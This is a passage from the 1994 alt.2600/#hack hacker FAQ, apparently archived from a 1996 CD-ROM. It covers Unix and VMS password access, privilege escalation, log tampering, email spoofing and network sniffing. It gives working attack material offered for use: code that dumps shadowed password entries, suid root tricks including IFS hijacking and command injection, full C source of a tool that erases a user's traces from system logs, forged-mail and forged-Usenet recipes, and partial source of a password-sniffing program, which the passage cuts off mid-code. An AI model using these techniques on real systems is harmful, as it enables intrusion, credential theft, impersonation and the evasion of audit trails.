home *** CD-ROM | disk | FTP | other *** search
/ Group 42-Sells Out! - The Information Archive / Group 42 Sells Out (Group 42) (1996).iso / faqs / a2600-10.txt next >
Text File  |  1995-11-30  |  173KB  |  5,085 lines

  1. Archive-name: alt-2600-faq
  2. Posting-Frequency: Random
  3. Last-Modified: 1994/12/18
  4. Version: Beta .010
  5.  
  6.  
  7. Editors Note: Welcome to Beta .010 of the alt.2600/#hack FAQ!
  8.  
  9.               Eleet greets go out to Outsider for producing an
  10.               excellent WWW version of this document at:
  11.               http://www.engin.umich.edu/~jgotts/hack-faq.html
  12.  
  13.               The purpose of this FAQ is to give you a general
  14.               introduction to the topics covered in alt.2600 and
  15.               #hack.  No document will make you a hacker.
  16.  
  17.               If you have a questions regarding any of the topics
  18.               covered in the FAQ, please direct it to alt.2600 or
  19.               #hack.  Please do not e-mail me with them, I'm getting
  20.               swamped.
  21.  
  22.               If your copy of the #hack FAQ does not end with the
  23.               letters EOT on a line by themselves, you do not have the
  24.               entire FAQ.
  25.  
  26.  
  27.                                  ** BETA **
  28.  
  29.                              Beta Revision .010
  30.  
  31.                             alt.2600/#Hack F.A.Q.
  32.  
  33.                         A TNO Communication Production
  34.  
  35.                                     by
  36.                                   Voyager
  37.                             will@gnu.ai.mit.edu
  38.  
  39.                                 Sysop of
  40.                              Hacker's Haven
  41.                               (303)343-4053
  42.  
  43.                            With special thanks to:
  44.  
  45.         A-Flat, Al, Aleph1, Bluesman, C-Curve, DeadKat, Edison,
  46.         Hobbit, KCrow, Major, Marauder, Novocain, Outsider, Presence,
  47.         Rogue Agent, sbin, Taran King, Tomes and TheSaint.
  48.  
  49.  
  50.                        We work in the dark
  51.                        We do what we can
  52.                        We give what we have
  53.                        Our doubt is our passion,
  54.                        and our passion is our task
  55.                        The rest is the madness of art.
  56.  
  57.                                 -- Henry James
  58.  
  59.  
  60.  
  61. Section A: Computers
  62.  
  63.   01. How do I access the password file under Unix?
  64. U 02. How do I crack Unix passwords?
  65.   03. What is password shadowing?
  66.   04. Where can I find the password file if it's shadowed?
  67.   05. What is NIS/yp?
  68.   06. What are those weird characters after the comma in my passwd file?
  69.   07. How do I access the password file under VMS?
  70.   08. How do I crack VMS passwords?
  71.   09. How do I break out of a restricted shell?
  72.   10. How do I gain root from a suid script or program?
  73.   11. How do I erase my presence from the system logs?
  74.   12. How do I send fakemail?
  75.   13. How do I fake posts to UseNet?
  76.   14. How do I hack ChanOp on IRC?
  77.   15. How do I modify the IRC client to hide my real username?
  78. U 16. How to I change to directories with strange characters in them?
  79.   17. What is ethernet sniffing?
  80.   18. What is an Internet Outdial?
  81.   19. What are some Internet Outdials?
  82. U 20. What is this system?
  83. U 21. What are the default accounts for XXX ?
  84.   22. What port is XXX on?
  85.   23. What is a trojan/worm/virus/logic bomb?
  86. U 24. How can I protect myself from virii and such?
  87.   25. What is Cryptoxxxxxxx?
  88.   26. What is PGP?
  89. U 27. What is Tempest?
  90.   28. What is an anonymous remailer?
  91.   29. What are the addresses of some anonymous remailers?
  92.   30. How do I defeat copy protection?
  93.   31. What is 127.0.0.1?
  94.  
  95.  
  96. Section B: Telephony
  97.  
  98. U 01. What is a Red Box?
  99. U 02. How do I build a Red Box?
  100.   03. Where can I get a 6.5536Mhz crystal?
  101.   04. Which payphones will a Red Box work on?
  102. N 05. How do I make local calls with a Red Box?
  103. U 06. What is a Blue Box?
  104.   07. Do Blue Boxes still work?
  105.   08. What is a Black Box?
  106. U 09. What do all the colored boxes do?
  107.   10. What is an ANAC number?
  108.   11. What is the ANAC number for my area?
  109.   12. What is a ringback number?
  110. U 13. What is the ringback number for my area?
  111.   14. What is a loop?
  112. U 15. What is a loop in my area?
  113. U 16. What is a CNA number?
  114. U 17. What is the telephone company CNA number for my area?
  115. U 18. What are some numbers that always ring busy?
  116. U 19. What are some numbers that temporarily disconnect phone service?
  117.   20. What is scanning?
  118.   21. Is scanning illegal?
  119.   22. Where can I purchase a lineman's handset?
  120.   23. What are the DTMF frequencies?
  121.   24. What are the frequencies of the telephone tones?
  122. U 25. What are all of the * codes?
  123.   26. What frequencies do cordless phones operate on?
  124.  
  125.  
  126. Section C: Resources
  127.  
  128. U 01. What are some ftp sites of interest to hackers?
  129. U 02. What are some newsgroups of interest to hackers?
  130. U 03. What are some telnet sites of interest to hackers?
  131. U 04. What are some gopher sites of interest to hackers?
  132. U 05. What are some World wide Web (WWW) sites of interest to hackers?
  133.   06. What are some IRC channels of interest to hackers?
  134. U 07. What are some BBS's of interest to hackers?
  135. U 08. What books are available on this subject?
  136. U 09. What are some mailing lists of interest to hackers?
  137. U 10. What are some print magazines of interest to hackers?
  138. U 11. What are some organizations of interest to hackers?
  139.   12. Where can I purchase a magnetic stripe encoder/decoder?
  140. N 13. What are the rainbow books and how can I get them?
  141.  
  142.  
  143. Section D: 2600
  144.  
  145.   01. What is alt.2600?
  146.   02. What does "2600" mean?
  147.   03. Are there on-line versions of 2600 available?
  148.   04. I can't find 2600 at any bookstores.  What can I do?
  149.   05. Why does 2600 cost more to subscribe to than to buy at a newsstand?
  150.  
  151.  
  152. Section E: Miscellaneous
  153.  
  154.   01. What does XXX stand for?
  155.   02. How do I determine if I have a valid credit card number?
  156.   03. What bank issued this credit card?
  157.   04. What are the ethics of hacking?
  158. U 05. Where can I get a copy of the alt.2600/#hack FAQ?
  159.  
  160.  
  161.  
  162. U == Updated since last release of the #hack FAQ
  163. N == New since last release of the #hack FAQ
  164.  
  165.  
  166.  
  167.  
  168. Section A: Computers
  169. ~~~~~~~~~~~~~~~~~~~~
  170.  
  171. 01. How do I access the password file under Unix?
  172.  
  173. In standard Unix the password file is /etc/passwd.  On a Unix system
  174. with either NIS/yp or password shadowing, much of the password data
  175. may be elsewhere.
  176.  
  177.  
  178. 02. How do I crack Unix passwords?
  179.  
  180. Contrary to popular belief, Unix passwords cannot be decrypted.  Unix
  181. passwords are encrypted with a one way function.  The login program
  182. encrypts the text you enter at the "password:" prompt and compares
  183. that encrypted string against the encrypted form of your password.
  184.  
  185. Password cracking software uses wordlists.  Each word in the wordlist
  186. is encrypted and the results are compared to the encrypted form of the
  187. target password.
  188.  
  189. The best cracking program for Unix passwords is currently Crack by
  190. Alec Muffett.  For PC-DOS, the best package to use is currently
  191. CrackerJack.
  192.  
  193.  
  194. 03. What is password shadowing?
  195.  
  196. Password shadowing is a security system where the encrypted password
  197. field of /etc/passwd is replaced with a special token and the
  198. encrypted password is stored in a separate file which is not readable
  199. by normal system users.
  200.  
  201. To defeat password shadowing on many (but not all) systems, write a
  202. program that uses successive calls to getpwent() to obtain the
  203. password file.
  204.  
  205. Example:
  206.  
  207. #include <pwd.h>
  208. main()
  209. {
  210. struct passwd *p;
  211. while(p=getpwent())
  212. printf("%s:%s:%d:%d:%s:%s:%s\n", p->pw_name, p->pw_passwd,
  213. p->pw_uid, p->pw_gid, p->pw_gecos, p->pw_dir, p->pw_shell);
  214. }
  215.  
  216.  
  217. 04. Where can I find the password file if it's shadowed?
  218.  
  219. Unix                  Path                            Token
  220. -----------------------------------------------------------------
  221. AIX 3                 /etc/security/passwd            !
  222.        or             /tcb/auth/files/<first letter   #
  223.                             of username>/<username>
  224. A/UX 3.0s             /tcb/files/auth/?/*
  225. BSD4.3-Reno           /etc/master.passwd              *
  226. ConvexOS 10           /etc/shadpw                     *
  227. ConvexOS 11           /etc/shadow                     *
  228. DG/UX                 /etc/tcb/aa/user/               *
  229. EP/IX                 /etc/shadow                     x
  230. HP-UX                 /.secure/etc/passwd             *
  231. IRIX 5                /etc/shadow                     x
  232. Linux 1.1             /etc/shadow                     *
  233. OSF/1                 /etc/passwd[.dir|.pag]          *
  234. SCO Unix #.2.x        /tcb/auth/files/<first letter   *
  235.                             of username>/<username>
  236. SunOS4.1+c2           /etc/security/passwd.adjunct    ##username
  237. SunOS 5.0             /etc/shadow
  238.                       <optional NIS+ private secure maps/tables/whatever>
  239. System V Release 4.0  /etc/shadow                     x
  240. System V Release 4.2  /etc/security/* database
  241. Ultrix 4              /etc/auth[.dir|.pag]            *
  242. UNICOS                /etc/udb                        *
  243.  
  244.  
  245. 05. What is NIS/yp?
  246.  
  247. NIS (Network Information System) in the current name for what was once
  248. known as yp (Yellow Pages).  The purpose for NIS is to allow many
  249. machines on a network to share configuration information, including
  250. password data.  NIS is not designed to promote system security.  If
  251. your system uses NIS you will have a very short /etc/passwd file that
  252. includes a line that looks like this:
  253.  
  254. +::0:0:::
  255.  
  256. To view the real password file use this command "ypcat passwd"
  257.  
  258.  
  259. 06. What are those weird characters after the comma in my passwd file?
  260.  
  261. The characters are password aging data.  Password aging forces the
  262. user to change passwords after a System Administrator specified period
  263. of time.  Password aging can also force a user to keep a password for
  264. a certain number of weeks before changing it.
  265.  
  266. ]
  267. ] Sample entry from /etc/passwd with password aging installed:
  268. ]
  269. ] will:5fg63fhD3d,M.z8:9406:12:Will Spencer:/home/fsg/will:/bin/bash
  270. ]
  271.  
  272. Note the comma in the encrypted password field.  The characters after
  273. the comma are used by the password aging mechanism.
  274.  
  275. ]
  276. ] Password aging characters from above example:
  277. ]
  278. ] M.z8
  279. ]
  280.  
  281. The four characters are interpreted as follows:
  282.  
  283.   1: Maximum number of weeks a password can be used without changing.
  284.   2: Minimum number of weeks a password must be used before changing.
  285. 3&4: Last time password was changed, in number of weeks since 1970.
  286.  
  287. Three special cases should be noted:
  288.  
  289. If the first and second characters are set to '..' the user will be
  290. forced to change his/her passwd the next time he/she logs in.  The
  291. passwd program will then remove the passwd aging characters, and the
  292. user will not be subjected to password aging requirements again.
  293.  
  294. If the third and fourth characters are set to '..' the user will be
  295. forced to change his/her passwd the next time he/she logs in. Password
  296. aging will then occur as defined by the first and second characters.
  297.  
  298. If the first character (MAX) is less than the second character (MIN),
  299. the user is not allowed to change his/her password.  Only root can
  300. change that users password.
  301.  
  302. It should also be noted that the su command does not check the password
  303. aging data.  An account with an expired password can be su'd to
  304. without being forced to change the password.
  305.  
  306.  
  307.                         Password Aging Codes
  308. +------------------------------------------------------------------------+
  309. |                                                                        |
  310. | Character:  .  /  0  1  2  3  4  5  6  7  8  9  A  B  C  D  E  F  G  H |
  311. |    Number:  0  1  2  3  4  5  6  7  8  9 10 11 12 13 14 15 16 17 18 19 |
  312. |                                                                        |
  313. | Character:  I  J  K  L  M  N  O  P  Q  R  S  T  U  V  W  X  Y  Z  a  b |
  314. |    Number: 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 |
  315. |                                                                        |
  316. | Character:  c  d  e  f  g  h  i  j  k  l  m  n  o  p  q  r  s  t  u  v |
  317. |    Number: 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 |
  318. |                                                                        |
  319. | Character:  w  x  y  z                                                 |
  320. |    Number: 60 61 62 63                                                 |
  321. |                                                                        |
  322. +------------------------------------------------------------------------+
  323.  
  324.  
  325. 07. How do I access the password file under VMS?
  326.  
  327. Under VMS, the password file is SYS$SYSTEM:SYSUAF.DAT.  However,
  328. unlike Unix, most users do not have access to read the password file.
  329.  
  330.  
  331. 08. How do I crack VMS passwords?
  332.  
  333. Write a program that uses the SYS$GETUAF functions to compare the
  334. results of encrypted words against the encrypted data in SYSUAF.DAT.
  335.  
  336. Two such programs are known to exist, CHECK_PASSWORD and
  337. GUESS_PASSWORD.
  338.  
  339.  
  340. 09. How do I break out of a restricted shell?
  341.  
  342. On poorly implemented restricted shells you can break out of the
  343. restricted environment by running a program that features a shell
  344. function.  A good example is vi.  Run vi and use this command:
  345.  
  346. :set shell=/bin/sh
  347.  
  348. then shell using this command:
  349.  
  350. :shell
  351.  
  352.  
  353. 10. How do I gain root from a suid script or program?
  354.  
  355. 1. Change IFS.
  356.  
  357. If the program calls any other programs using the system() function
  358. call, you may be able to fool it by changing IFS.  IFS is the Internal
  359. Field Separator that the shell uses to delimit arguments.
  360.  
  361. If the program contains a line that looks like this:
  362.  
  363. system("/bin/date")
  364.  
  365. and you change IFS to '/' the shell will them interpret the
  366. proceeding line as:
  367.  
  368. bin date
  369.  
  370. Now, if you have a program of your own in the path called "bin" the
  371. suid program will run your program instead of /bin/date.
  372.  
  373. To change IFS, use this command:
  374.  
  375. IFS='/';export IFS      # Bourne Shell
  376. setenv IFS '/'          # C Shell
  377. export IFS='/'          # Korn Shell
  378.  
  379.  
  380. 2. link the script to -i
  381.  
  382. Create a symbolic link named "-i" to the program.  Running "-i"
  383. will cause the interpreter shell (/bin/sh) to start up in interactive
  384. mode.  This only works on suid shell scripts.
  385.  
  386. Example:
  387.  
  388. % ln suid.sh -i
  389. % -i
  390. #
  391.  
  392.  
  393. 3. Exploit a race condition
  394.  
  395. Replace a symbolic link to the program with another program while the
  396. kernel is loading /bin/sh.
  397.  
  398. Example:
  399.  
  400. nice -19 suidprog ; ln -s evilprog suidroot
  401.  
  402.  
  403. 4. Send bad input to the program.
  404.  
  405. Invoke the name of the program and a separate command on the same
  406. command line.
  407.  
  408. Example:
  409.  
  410. suidprog ; id
  411.  
  412.  
  413. 11. How do I erase my presence from the system logs?
  414.  
  415. Edit /etc/utmp, /usr/adm/wtmp and /usr/adm/lastlog. These are not text
  416. files that can be edited by hand with vi, you must use a program
  417. specifically written for this purpose.
  418.  
  419. Example:
  420.  
  421. #include <sys/types.h>
  422. #include <stdio.h>
  423. #include <unistd.h>
  424. #include <sys/file.h>
  425. #include <fcntl.h>
  426. #include <utmp.h>
  427. #include <pwd.h>
  428. #include <lastlog.h>
  429. #define WTMP_NAME "/usr/adm/wtmp"
  430. #define UTMP_NAME "/etc/utmp"
  431. #define LASTLOG_NAME "/usr/adm/lastlog"
  432.  
  433. int f;
  434.  
  435. void kill_utmp(who)
  436. char *who;
  437. {
  438.     struct utmp utmp_ent;
  439.  
  440.   if ((f=open(UTMP_NAME,O_RDWR))>=0) {
  441.      while(read (f, &utmp_ent, sizeof (utmp_ent))> 0 )
  442.        if (!strncmp(utmp_ent.ut_name,who,strlen(who))) {
  443.                  bzero((char *)&utmp_ent,sizeof( utmp_ent ));
  444.                  lseek (f, -(sizeof (utmp_ent)), SEEK_CUR);
  445.                  write (f, &utmp_ent, sizeof (utmp_ent));
  446.             }
  447.      close(f);
  448.   }
  449. }
  450.  
  451. void kill_wtmp(who)
  452. char *who;
  453. {
  454.     struct utmp utmp_ent;
  455.     long pos;
  456.  
  457.     pos = 1L;
  458.     if ((f=open(WTMP_NAME,O_RDWR))>=0) {
  459.  
  460.      while(pos != -1L) {
  461.         lseek(f,-(long)( (sizeof(struct utmp)) * pos),L_XTND);
  462.         if (read (f, &utmp_ent, sizeof (struct utmp))<0) {
  463.           pos = -1L;
  464.         } else {
  465.           if (!strncmp(utmp_ent.ut_name,who,strlen(who))) {
  466.                bzero((char *)&utmp_ent,sizeof(struct utmp ));
  467.                lseek(f,-( (sizeof(struct utmp)) * pos),L_XTND);
  468.                write (f, &utmp_ent, sizeof (utmp_ent));
  469.                pos = -1L;
  470.           } else pos += 1L;
  471.         }
  472.      }
  473.      close(f);
  474.   }
  475. }
  476.  
  477. void kill_lastlog(who)
  478. char *who;
  479. {
  480.     struct passwd *pwd;
  481.     struct lastlog newll;
  482.  
  483.      if ((pwd=getpwnam(who))!=NULL) {
  484.  
  485.         if ((f=open(LASTLOG_NAME, O_RDWR)) >= 0) {
  486.             lseek(f, (long)pwd->pw_uid * sizeof (struct lastlog), 0);
  487.             bzero((char *)&newll,sizeof( newll ));
  488.             write(f, (char *)&newll, sizeof( newll ));
  489.             close(f);
  490.         }
  491.  
  492.     } else printf("%s: ?\n",who);
  493. }
  494.  
  495. main(argc,argv)
  496. int argc;
  497. char *argv[];
  498. {
  499.     if (argc==2) {
  500.         kill_lastlog(argv[1]);
  501.         kill_wtmp(argv[1]);
  502.         kill_utmp(argv[1]);
  503.         printf("Zap2!\n");
  504.     } else
  505.     printf("Error.\n");
  506. }
  507.  
  508.  
  509. 12. How do I send fakemail?
  510.  
  511. Telnet to port 25 of the machine you want the mail to appear to
  512. originate from.  Enter your message as in this example:
  513.  
  514.  HELO bellcore.com
  515.  MAIL FROM:Voyager@bellcore.com
  516.  RCPT TO:president@whitehouse.gov
  517.  DATA
  518.  
  519.         Please discontinue your silly Clipper initiative.
  520.  .
  521.  QUIT
  522.  
  523. On systems that have RFC 931 implemented, spoofing your "MAIL FROM:"
  524. line will not work.  Test by sending yourself fakemail first.
  525.  
  526. For more informationm read RFC 822 "Standard for the format of ARPA
  527. Internet text messages."
  528.  
  529.  
  530. 13. How do I fake posts to UseNet?
  531.  
  532. Use inews to post.  Give inews the following lines:
  533.  
  534.  From:
  535.  Newsgroups:
  536.  Subject:
  537.  Message-ID:
  538.  Date:
  539.  Organization:
  540.  
  541. For a moderated newsgroup, inews will also require this line:
  542.  
  543.  Approved:
  544.  
  545. Then add your post and terminate with <Control-D>.
  546.  
  547. Example:
  548.  
  549.  From: Eric S. Real
  550.  Newsgroups: alt.hackers
  551.  Subject: Pathetic bunch of wannabe losers
  552.  Message-ID: <esr.123@locke.ccil.org>
  553.  Date: Fri, 13 Aug 1994 12:15:03
  554.  Organization: Moral Majority
  555.  
  556.  A pathetic bunch of wannabe losers is what most of you are, with no
  557.  right to steal the honorable title of `hacker' to puff up your silly
  558.  adolescent egos. Get stuffed, get lost, and go to jail.
  559.  
  560.                                         Eric S. Real <esr@locke.ccil.org>
  561.  
  562.  
  563.  ^D
  564.  
  565. Note that many systems will append an Originator: line to your message
  566. header, effectively revealing the account from which the message was
  567. posted.
  568.  
  569.  
  570. 14. How do I hack ChanOp on IRC?
  571.  
  572. Find a server that is split from the rest of IRC and create your own
  573. channel there using the name of the channel you want ChanOp on.  When
  574. that server reconnects to the net, you will have ChanOp on the real
  575. channel.  If you have ServerOp on a server, you can cause it to split
  576. on purpose.
  577.  
  578.  
  579. 15. How do I modify the IRC client to hide my real username?
  580.  
  581. Get the IRC client from cs.bu.edu /irc/clients.  Look at the source
  582. code files irc.c and ctcp.c.  The code you are looking for is fairly
  583. easy to spot.  Change it. Change the username code in irc.c and the
  584. ctcp information code in ctcp.c.  Compile and run your client.
  585.  
  586. Here are the diffs from a sample hack of the IRC client.  Your client
  587. code will vary slightly depending on what IRC client version you are
  588. running.
  589.  
  590. *** ctcp.c.old  Wed Feb 10 10:08:05 1993
  591. --- ctcp.c      Fri Feb 12 04:33:55 1993
  592. ***************
  593. *** 331,337 ****
  594.         struct  passwd  *pwd;
  595.         long    diff;
  596.         int     uid;
  597. !       char    c;
  598.  
  599.         /*
  600.          * sojge complained that ircII says 'idle 1 seconds'
  601. --- 331,337 ----
  602.         struct  passwd  *pwd;
  603.         long    diff;
  604.         int     uid;
  605. !       char    c, *fing;
  606.  
  607.         /*
  608.          * sojge complained that ircII says 'idle 1 seconds'
  609. ***************
  610. *** 348,354 ****
  611.         if (uid != DAEMON_UID)
  612.         {
  613.   #endif /* DAEMON_UID */
  614. !               if (pwd = getpwuid(uid))
  615.                 {
  616.                         char    *tmp;
  617.  
  618. --- 348,356 ----
  619.         if (uid != DAEMON_UID)
  620.         {
  621.   #endif /* DAEMON_UID */
  622. !               if (fing = getenv("IRCFINGER"))
  623. !                       send_ctcp_reply(from, ctcp->name, fing, diff, c);
  624. !               else if (pwd = getpwuid(uid))
  625.                 {
  626.                         char    *tmp;
  627.  
  628. *** irc.c.old   Wed Feb 10 06:33:11 1993
  629. --- irc.c       Fri Feb 12 04:02:11 1993
  630. ***************
  631. *** 510,516 ****
  632.                 malloc_strcpy(&my_path, "/");
  633.         if (*realname == null(char))
  634.                 strmcpy(realname, "*Unknown*", REALNAME_LEN);
  635. !       if (*username == null(char))
  636.         {
  637.                 if (ptr = getenv("USER"))
  638.                         strmcpy(username, ptr, NAME_LEN);
  639. --- 510,518 ----
  640.                 malloc_strcpy(&my_path, "/");
  641.         if (*realname == null(char))
  642.                 strmcpy(realname, "*Unknown*", REALNAME_LEN);
  643. !       if (ptr = getenv("IRCUSER"))
  644. !               strmcpy(username, ptr, NAME_LEN);
  645. !       else if (*username == null(char))
  646.         {
  647.                 if (ptr = getenv("USER"))
  648.                         strmcpy(username, ptr, NAME_LEN);
  649.  
  650.  
  651. 16. How to I change to directories with strange characters in them?
  652.  
  653. These directories are often used by people trying to hide information,
  654. most often warez (commercial software).
  655.  
  656. There are several things you can do to determine what these strange
  657. characters are.  One is to use the arguments to the ls command that
  658. cause ls to give you more information:
  659.  
  660. From the man page for ls:
  661.  
  662.     -F   Causes directories to be marked with a trailing ``/'',
  663.          executable files to be marked with a trailing ``*'', and
  664.          symbolic links to be marked with a trailing ``@'' symbol.
  665.  
  666.     -q   Forces printing of non-graphic characters in filenames as the
  667.          character ``?''.
  668.  
  669.     -b   Forces printing of non-graphic characters in the \ddd
  670.          notation, in octal.
  671.  
  672. Perhaps the most useful tool is to simply do an "ls -al filename" to
  673. save the directory of the remote ftp site as a file on your local
  674. machine.  Then you can do a "cat -t -v -e filename" too see exactly
  675. what those bizarre little characters are.
  676.  
  677. From the man page for cat:
  678.  
  679.     -v  Causes non-printing characters (with the exception of tabs,
  680.         newlines, and form feeds) to be displayed.  Control characters
  681.         are displayed as ^X (<Ctrl>x), where X is the key pressed with
  682.         the <Ctrl> key (for example, <Ctrl>m is displayed as ^M).  The
  683.         <Del> character (octal 0177) is printed as ^?.  Non-ASCII
  684.         characters (with the high bit set) are printed as M -x, where
  685.         x is the character specified by the seven low order bits.
  686.  
  687.     -t  Causes tabs to be printed as ^I and form feeds as ^L.  This
  688.         option is ignored if the -v option is not specified.
  689.  
  690.     -e  Causes a ``$'' character to be printed at the end of each line
  691.         (prior to the new-line).  This option is ignored if the -v
  692.         option is not set.
  693.  
  694. If the directory name includes a <SPACE> or a <TAB> you will need to
  695. enclose the entire directory name in quotes.  Example:
  696.  
  697. cd "..<TAB>"
  698.  
  699. On an IBM-PC, you may enter these special characters by holding down
  700. the <ALT> key and entering the decimal value of the special character
  701. on your numeric keypad.  When you release the <ALT> key, the special
  702. character should appear on your screen.  An ASCII chart can be very
  703. helpful.
  704.  
  705. Sometimes people will create directories with some of the standard
  706. stty control characters in them, such as ^Z (suspend) or ^C (intr).
  707. To get into those directories, you will first need to user stty to
  708. change the control character in qustion to another character.
  709.  
  710. From the man page for stty:
  711.  
  712.     Control assignments
  713.  
  714.     control-character C
  715.                       Sets control-character to C, where control-character is
  716.                       erase, kill, intr (interrupt), quit, eof, eol, swtch
  717.                       (switch), start, stop or susp.
  718.  
  719.                       start and stop are available as possible control char-
  720.                       acters for the control-character C assignment.
  721.  
  722.                       If C is preceded by a caret (^) (escaped from the
  723.                       shell), then the value used is the corresponding con-
  724.                       trol character (for example, ^D is a <Ctrl>d; ^? is
  725.                       interpreted as DELETE and ^- is interpreted as unde-
  726.                       fined).
  727.  
  728. Use the stty -a command to see your current stty settings, and to
  729. determine which one is causing you problems.
  730.  
  731.  
  732. 17. What is ethernet sniffing?
  733.  
  734. Ethernet sniffing is listening (with software) to the raw ethernet
  735. device for packets that interest you.  When your software sees a
  736. packet that fits certain criteria, it logs it to a file.  The most
  737. common criteria for an interesting packet is one that contains words
  738. like "login" or "password."
  739.  
  740. Many ethernet sniffers are available, here are a few that may be on
  741. your system now:
  742.  
  743. OS              Sniffer
  744. ~~              ~~~~~~~
  745. HP/UX           nettl (monitor) & netfmt (display)
  746.                 nfswatch        /* Available via anonymous ftp           */
  747. Irix            nfswatch        /* Available via anonymous ftp           */
  748.                 Etherman
  749. SunOS           etherfind
  750.                 nfswatch        /* Available via anonymous ftp           */
  751. Solaris         snoop
  752. DOS             ETHLOAD         /* Available via anonymous ftp as        */
  753.                                 /* ethld104.zip                          */
  754.                 The Gobbler     /* Available via anonymous ftp           */
  755.                 LanPatrol
  756.                 LanWatch
  757.                 Netmon
  758.                 Netwatch
  759.                 Netzhack        /* Available via anonymous ftp at        */
  760.                                 /* mistress.informatik.unibw-muenchen.de */
  761.                                 /* /pub/netzhack.mac                     */
  762. Macintosh       Etherpeek
  763.  
  764. Here is source code for an ethernet sniffer:
  765.  
  766. /* Esniff.c */
  767.  
  768. #include <stdio.h>
  769. #include <ctype.h>
  770. #include <string.h>
  771.  
  772. #include <sys/time.h>
  773. #include <sys/file.h>
  774. #include <sys/stropts.h>
  775. #include <sys/signal.h>
  776. #include <sys/types.h>
  777. #include <sys/socket.h>
  778. #include <sys/ioctl.h>
  779.  
  780. #include <net/if.h>
  781. #include <net/nit_if.h>
  782. #include <net/nit_buf.h>
  783. #include <net/if_arp.h>
  784.  
  785. #include <netinet/in.h>
  786. #include <netinet/if_ether.h>
  787. #include <netinet/in_systm.h>
  788. #include <netinet/ip.h>
  789. #include <netinet/udp.h>
  790. #include <netinet/ip_var.h>
  791. #include <netinet/udp_var.h>
  792. #include <netinet/in_systm.h>
  793. #include <netinet/tcp.h>
  794. #include <netinet/ip_icmp.h>
  795.  
  796. #include <netdb.h>
  797. #include <arpa/inet.h>
  798.  
  799. #define ERR stderr
  800.  
  801. char    *malloc();
  802. char    *device,
  803.         *ProgName,
  804.         *LogName;
  805. FILE    *LOG;
  806. int     debug=0;
  807.  
  808. #define NIT_DEV     "/dev/nit"
  809. #define CHUNKSIZE   4096        /* device buffer size */
  810. int     if_fd = -1;
  811. int     Packet[CHUNKSIZE+32];
  812.  
  813. void Pexit(err,msg)
  814. int err; char *msg;
  815. { perror(msg);
  816.   exit(err); }
  817.  
  818. void Zexit(err,msg)
  819. int err; char *msg;
  820. { fprintf(ERR,msg);
  821.   exit(err); }
  822.  
  823. #define IP          ((struct ip *)Packet)
  824. #define IP_OFFSET   (0x1FFF)
  825. #define SZETH       (sizeof(struct ether_header))
  826. #define IPLEN       (ntohs(ip->ip_len))
  827. #define IPHLEN      (ip->ip_hl)
  828. #define TCPOFF      (tcph->th_off)
  829. #define IPS         (ip->ip_src)
  830. #define IPD         (ip->ip_dst)
  831. #define TCPS        (tcph->th_sport)
  832. #define TCPD        (tcph->th_dport)
  833. #define IPeq(s,t)   ((s).s_addr == (t).s_addr)
  834.  
  835. #define TCPFL(FLAGS) (tcph->th_flags & (FLAGS))
  836.  
  837. #define MAXBUFLEN  (128)
  838. time_t  LastTIME = 0;
  839.  
  840. struct CREC {
  841.      struct CREC *Next,
  842.                  *Last;
  843.      time_t  Time;              /* start time */
  844.      struct in_addr SRCip,
  845.                     DSTip;
  846.      u_int   SRCport,           /* src/dst ports */
  847.              DSTport;
  848.      u_char  Data[MAXBUFLEN+2]; /* important stuff :-) */
  849.      u_int   Length;            /* current data length */
  850.      u_int   PKcnt;             /* # pkts */
  851.      u_long  LASTseq;
  852. };
  853.  
  854. struct CREC *CLroot = NULL;
  855.  
  856. char *Symaddr(ip)
  857. register struct in_addr ip;
  858. { register struct hostent *he =
  859.       gethostbyaddr((char *)&ip.s_addr, sizeof(struct in_addr),AF_INET);
  860.  
  861.   return( (he)?(he->h_name):(inet_ntoa(ip)) );
  862. }
  863.  
  864. char *TCPflags(flgs)
  865. register u_char flgs;
  866. { static char iobuf[8];
  867. #define SFL(P,THF,C) iobuf[P]=((flgs & THF)?C:'-')
  868.  
  869.   SFL(0,TH_FIN, 'F');
  870.   SFL(1,TH_SYN, 'S');
  871.   SFL(2,TH_RST, 'R');
  872.   SFL(3,TH_PUSH,'P');
  873.   SFL(4,TH_ACK, 'A');
  874.   SFL(5,TH_URG, 'U');
  875.   iobuf[6]=0;
  876.   return(iobuf);
  877. }
  878.  
  879. char *SERVp(port)
  880. register u_int port;
  881. { static char buf[10];
  882.   register char *p;
  883.  
  884.    switch(port) {
  885.      case IPPORT_LOGINSERVER: p="rlogin"; break;
  886.      case IPPORT_TELNET:      p="telnet"; break;
  887.      case IPPORT_SMTP:        p="smtp"; break;
  888.      case IPPORT_FTP:         p="ftp"; break;
  889.      default: sprintf(buf,"%u",port); p=buf; break;
  890.    }
  891.    return(p);
  892. }
  893.  
  894. char *Ptm(t)
  895. register time_t *t;
  896. { register char *p = ctime(t);
  897.   p[strlen(p)-6]=0; /* strip " YYYY\n" */
  898.   return(p);
  899. }
  900.  
  901. char *NOWtm()
  902. { time_t tm;
  903.   time(&tm);
  904.   return( Ptm(&tm) );
  905. }
  906.  
  907. #define MAX(a,b) (((a)>(b))?(a):(b))
  908. #define MIN(a,b) (((a)<(b))?(a):(b))
  909.  
  910. /* add an item */
  911. #define ADD_NODE(SIP,DIP,SPORT,DPORT,DATA,LEN) { \
  912.   register struct CREC *CLtmp = \
  913.         (struct CREC *)malloc(sizeof(struct CREC)); \
  914.   time( &(CLtmp->Time) ); \
  915.   CLtmp->SRCip.s_addr = SIP.s_addr; \
  916.   CLtmp->DSTip.s_addr = DIP.s_addr; \
  917.   CLtmp->SRCport = SPORT; \
  918.   CLtmp->DSTport = DPORT; \
  919.   CLtmp->Length = MIN(LEN,MAXBUFLEN); \
  920.   bcopy( (u_char *)DATA, (u_char *)CLtmp->Data, CLtmp->Length); \
  921.   CLtmp->PKcnt = 1; \
  922.   CLtmp->Next = CLroot; \
  923.   CLtmp->Last = NULL; \
  924.   CLroot = CLtmp; \
  925. }
  926.  
  927. register struct CREC *GET_NODE(Sip,SP,Dip,DP)
  928. register struct in_addr Sip,Dip;
  929. register u_int SP,DP;
  930. { register struct CREC *CLr = CLroot;
  931.  
  932.   while(CLr != NULL) {
  933.     if( (CLr->SRCport == SP) && (CLr->DSTport == DP) &&
  934.         IPeq(CLr->SRCip,Sip) && IPeq(CLr->DSTip,Dip) )
  935.             break;
  936.     CLr = CLr->Next;
  937.   }
  938.   return(CLr);
  939. }
  940.  
  941. #define ADDDATA_NODE(CL,DATA,LEN) { \
  942.  bcopy((u_char *)DATA, (u_char *)&CL->Data[CL->Length],LEN); \
  943.  CL->Length += LEN; \
  944. }
  945.  
